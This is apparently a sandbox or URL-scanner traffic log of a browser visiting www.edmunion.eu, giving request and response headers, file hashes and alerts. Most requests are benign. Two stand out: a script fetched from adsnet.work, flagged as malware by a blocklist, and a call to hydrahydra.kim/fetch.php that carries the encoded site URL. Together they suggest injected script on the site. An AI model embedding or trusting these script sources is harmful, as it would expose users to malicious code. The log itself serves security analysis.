last-modified: Wed, 27 Apr 2022 17:03:52 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 7884, version 1.0\012- data
Size:   7884
Md5:    9212f6f9860f9fc6c69b02fedf6db8c3
Sha1:   ac6d71b4d5fdd2b3dabc9a06ff6c001e4251da0b
Sha256: 7d93459d86585bfcdbb7e0376056226adb25821ee54b96236fe2123e9560929f
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.35
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 04 Nov 2022 20:42:22 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /scripts/placer.js HTTP/1.1 
Host: adsnet.work
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://www.edmunion.eu/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         193.3.19.36
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Fri, 04 Nov 2022 20:42:22 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/7.4.26
Access-Control-Allow-Origin: *
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  ASCII text
Size:   377
Md5:    4435b6168b6acda2edea1c16ab2d857a
Sha1:   eff2c42517e44a568b5011125b5cba022f27f67f
Sha256: dcd5ff0b5118befd94a04b7bbc750b5a7b473e39fefd81e235f79bd848916569

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/uploads/2018/03/cropped-logo-32x32.png HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 1681
Last-Modified: Sat, 03 Mar 2018 16:39:51 GMT
Connection: keep-alive
ETag: "5a9acfd7-691"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced\012- data
Size:   1681
Md5:    788986c804d445568b96be4b71820091
Sha1:   fed718b9e66802553c7899b3583ae1113d957eb0
Sha256: 51db5276a3d5864bf2beb7bf7b24fc13b8cf204ce330196f419f0b74a268cfa7
                                        
                                            GET /wp-content/uploads/2018/03/cropped-logo-192x192.png HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 18794
Last-Modified: Sat, 03 Mar 2018 16:39:51 GMT
Connection: keep-alive
ETag: "5a9acfd7-496a"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 192 x 192, 8-bit/color RGBA, non-interlaced\012- data
Size:   18794
Md5:    6aa4847324d12a67dc4bb794f4a93c50
Sha1:   0e15294f75e1ef538c34a5ab3ec82f11976cc921
Sha256: b457d86b3b74e45e53bbe488fb69961c3664383cbb65ad694fe9b2985c7703ca
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "938899F21FDF4E477F02C6F7F32CBED05BB1DF35E3B221C3A37E8C214B2DC946"
Last-Modified: Thu, 03 Nov 2022 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=15040
Expires: Sat, 05 Nov 2022 00:53:02 GMT
Date: Fri, 04 Nov 2022 20:42:22 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "938899F21FDF4E477F02C6F7F32CBED05BB1DF35E3B221C3A37E8C214B2DC946"
Last-Modified: Thu, 03 Nov 2022 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=15040
Expires: Sat, 05 Nov 2022 00:53:02 GMT
Date: Fri, 04 Nov 2022 20:42:22 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "938899F21FDF4E477F02C6F7F32CBED05BB1DF35E3B221C3A37E8C214B2DC946"
Last-Modified: Thu, 03 Nov 2022 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=15040
Expires: Sat, 05 Nov 2022 00:53:02 GMT
Date: Fri, 04 Nov 2022 20:42:22 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "938899F21FDF4E477F02C6F7F32CBED05BB1DF35E3B221C3A37E8C214B2DC946"
Last-Modified: Thu, 03 Nov 2022 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=15040
Expires: Sat, 05 Nov 2022 00:53:02 GMT
Date: Fri, 04 Nov 2022 20:42:22 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "938899F21FDF4E477F02C6F7F32CBED05BB1DF35E3B221C3A37E8C214B2DC946"
Last-Modified: Thu, 03 Nov 2022 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=15040
Expires: Sat, 05 Nov 2022 00:53:02 GMT
Date: Fri, 04 Nov 2022 20:42:22 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F3a631333-54a4-458c-b54b-2dd96d4ede5a.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 11188
x-amzn-requestid: 72e0a128-e0c4-4a93-8e29-01a574b2d1c3
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bC0XNHPcoAMFkNQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6364342d-341a40d37b7bcc9153749d67;Sampled=0
x-amzn-remapped-date: Thu, 03 Nov 2022 21:35:41 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: eo3FBGjoivBN1-4xP1UiTocKbLd87acRtOX2AQrPr1a4yDboDrXYRA==
via: 1.1 da5952aa802df39905ceb16592e9698a.cloudfront.net (CloudFront), 1.1 01147dcc35d57fc0238a3c1700c13f16.cloudfront.net (CloudFront), 1.1 google
date: Thu, 03 Nov 2022 21:53:38 GMT
age: 82124
etag: "29ca25963b777fd7463c65d8cde6d65172c996e1"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   11188
Md5:    5aedde5b1d003651d773c89833460868
Sha1:   29ca25963b777fd7463c65d8cde6d65172c996e1
Sha256: 04b95b954d7d992e6547d05d052c6f3f8a4cfb4a5988f9e6c6629969053bf7b3
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F08eaa5d0-649d-4568-ac8b-ca60d91ab718.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 7703
x-amzn-requestid: 4f835957-6df6-4001-9c34-ed9749000b46
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bC0RpFGwoAMF0-g=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6364340a-3f7b7dd36cb07d057b64ec2f;Sampled=0
x-amzn-remapped-date: Thu, 03 Nov 2022 21:35:06 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: DknsakNef7SUQhERTPiLozTDA4tl1OEdE8ohicMEfVGvwaLwPX8d_Q==
via: 1.1 0c96ded7ff282d2dbcf47c918b6bb500.cloudfront.net (CloudFront), 1.1 d01e7742f82df0bbc1fb681d709ed69c.cloudfront.net (CloudFront), 1.1 google
date: Thu, 03 Nov 2022 21:54:49 GMT
age: 82053
etag: "d4d2ee1aa9beb5bbd19aaaf590c8a0832fb180cd"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7703
Md5:    9a763d44e05fa357713a41ab1388974a
Sha1:   d4d2ee1aa9beb5bbd19aaaf590c8a0832fb180cd
Sha256: f351b7e90e5435af071892b62af3ac591bc553281b3ea63b1ae067a3d03f572d
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F98808735-da09-4166-b898-eee474b2aed2.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 10810
x-amzn-requestid: 85c9096f-2671-4f0e-94a3-607254d036d8
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bC057E5yIAMFcXw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6364350c-3c93b6e56e6141a63d1285eb;Sampled=0
x-amzn-remapped-date: Thu, 03 Nov 2022 21:39:24 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: i3Kso77aQ6Qt3z3KH189niLwWzWFJz7Y0aMQngNRahdqlMAo76WksQ==
via: 1.1 49b94a8674d6e86a841d6523f7dbaf14.cloudfront.net (CloudFront), 1.1 32d624dbeb2a8b7f24dbe49007e37c90.cloudfront.net (CloudFront), 1.1 google
date: Thu, 03 Nov 2022 21:52:42 GMT
age: 82180
etag: "8191eb019b21bed2b9f53c755e1c24d08dc70760"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   10810
Md5:    c472942cb4b85610a3e83edf7527f923
Sha1:   8191eb019b21bed2b9f53c755e1c24d08dc70760
Sha256: 0dc7f9902567b0130c1c34b6e356b8239f8e6c83e1d38ac9b74588270000279c
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F3d05e3a2-b178-419f-90de-a1985765ff09.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 6557
x-amzn-requestid: f2e39db1-fb8a-4a9b-8a1d-ee08000ddeb6
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bC1VyFHuIAMF5Eg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-636435be-7a03ef677f8dbd680f72de90;Sampled=0
x-amzn-remapped-date: Thu, 03 Nov 2022 21:42:22 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: OI-hzSDTy-vFSFOZxI98XT8VZmnpFlU_cobzCTkrn4T5NuH8cqybMg==
via: 1.1 0c96ded7ff282d2dbcf47c918b6bb500.cloudfront.net (CloudFront), 1.1 0d4ebcaa87ba94709def0eaac9371e5a.cloudfront.net (CloudFront), 1.1 google
date: Thu, 03 Nov 2022 21:52:32 GMT
age: 82190
etag: "594e5a82ce82fb4cd76548b6d2d6b4cc419b7e4c"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6557
Md5:    ca6c7517d7015fbc35fa290c1c2d6afd
Sha1:   594e5a82ce82fb4cd76548b6d2d6b4cc419b7e4c
Sha256: a746b36be50209915a0e5657abd219aab382eee4b7556142aa1316daf3a9f5a4
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F3494b1e3-ddc8-454c-8b43-e70e2d8f07b8.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 11421
x-amzn-requestid: 8436166b-f342-44e9-9a31-e25dcaa7b85c
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: a2gEOEYRIAMFQ2g=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-635f46e7-0616a6b95503fffd4f597509;Sampled=0
x-amzn-remapped-date: Mon, 31 Oct 2022 03:54:15 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: g3OtcJnT2JfzIAvUjoLvC8pOzfwGFQ-M0cH4uwNSVcr2T9jYgCihTw==
via: 1.1 41e349e25dc4bc856d0e5d2c162428a0.cloudfront.net (CloudFront), 1.1 2324edbcb8fc72f617442c65f36a40fc.cloudfront.net (CloudFront), 1.1 google
date: Thu, 03 Nov 2022 23:36:56 GMT
age: 75926
etag: "f7705fcd2d91ce90c58e79324cce1e3abba6c1c8"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   11421
Md5:    2ae2b8d827fb2c8bef64febcd36f1645
Sha1:   f7705fcd2d91ce90c58e79324cce1e3abba6c1c8
Sha256: 2dc55e97ef3a85fccb104b80161a8bac16b12d37527c336563677432584c7ad5
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F1cdc7f46-586b-486f-968f-5fe03bbb41a9.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 7601
x-amzn-requestid: bec1a71e-c5bd-4332-ac60-18b49304a5a3
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: a275aEHYoAMFwlA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-635f736f-1b36c60a43415790430fbecf;Sampled=0
x-amzn-remapped-date: Mon, 31 Oct 2022 07:04:15 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: MORvkZWLXGvSFYxjnSiYJluJY302y_FTvACRUrEvo7vLYkheyEcE1g==
via: 1.1 2dc111aa3ead15d061e41a423155a53a.cloudfront.net (CloudFront), 1.1 2ab6211e66998c8b58132661a7e3cade.cloudfront.net (CloudFront), 1.1 google
date: Fri, 04 Nov 2022 07:18:27 GMT
age: 48235
etag: "c721a00ae618e6ed997e102fa3d977ef830cac05"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7601
Md5:    ae1ac87f2e6534322ba259d6e06fcaa5
Sha1:   c721a00ae618e6ed997e102fa3d977ef830cac05
Sha256: 2f4cab8b925f6a79ed96b08edc00f04186d33ed9cfd4ba565884a931e83ae408
                                        
                                            GET /fetch.php?tracker=adsnet.work&site=aHR0cDovL3d3dy5lZG11bmlvbi5ldS8= HTTP/1.1 
Host: hydrahydra.kim
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         193.3.19.36
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Fri, 04 Nov 2022 20:42:23 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/7.4.26
Access-Control-Allow-Origin: *
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fa936c143-4ac1-4c0f-a7c9-35638fe066ce.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 3559
x-amzn-requestid: 63f00dbe-834f-4fbb-91c0-5e5378dc48aa
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bC0SvEOaIAMFRBg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63643411-43380b3457de631756afdb81;Sampled=0
x-amzn-remapped-date: Thu, 03 Nov 2022 21:35:13 GMT
x-amz-cf-pop: SEA19-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: hit7lhSIgTngtNcj0qlMHVtdtjSdfA6-lP8QBAyhVJfqyS-PaMHNkw==
via: 1.1 ef6538ee7be7b17c84d06edb0f4c0a1a.cloudfront.net (CloudFront), 1.1 89791e6b21b9a30cc51cac1bc51cf098.cloudfront.net (CloudFront), 1.1 google
date: Thu, 03 Nov 2022 22:00:51 GMT
etag: "b71b29860aca017ac124fb4037cec5dc3101474e"
age: 81698
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   3559
Md5:    3e2c2868516a60c335361ccef89c6090
Sha1:   b71b29860aca017ac124fb4037cec5dc3101474e
Sha256: 3ac5d5410a9d31317c2f31fe3e08cdb188e26bfffce5275b85cce986f2841d22
                                        
                                            GET /css?family=Arimo%3A400%2C400i%2C700%2C700i&subset=latin%2Clatin-ext HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://www.edmunion.eu/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         142.250.74.10
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Fri, 04 Nov 2022 20:42:21 GMT
date: Fri, 04 Nov 2022 20:42:21 GMT
cache-control: private, max-age=86400
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /css?family=Montserrat%3A100%2C200%2C300%2C300i%2C400%2C400i%2C500%2C600%2C700%2C800%2C900&subset=latin%2Clatin-ext HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://www.edmunion.eu/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         142.250.74.10
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Fri, 04 Nov 2022 20:42:21 GMT
date: Fri, 04 Nov 2022 20:42:21 GMT
cache-control: private, max-age=86400
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /css?family=Poppins%3A300%2C400%2C500%2C600%2C700&subset=latin%2Clatin-ext HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://www.edmunion.eu/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         142.250.74.10
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Fri, 04 Nov 2022 20:42:21 GMT
date: Fri, 04 Nov 2022 20:42:21 GMT
cache-control: private, max-age=86400
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
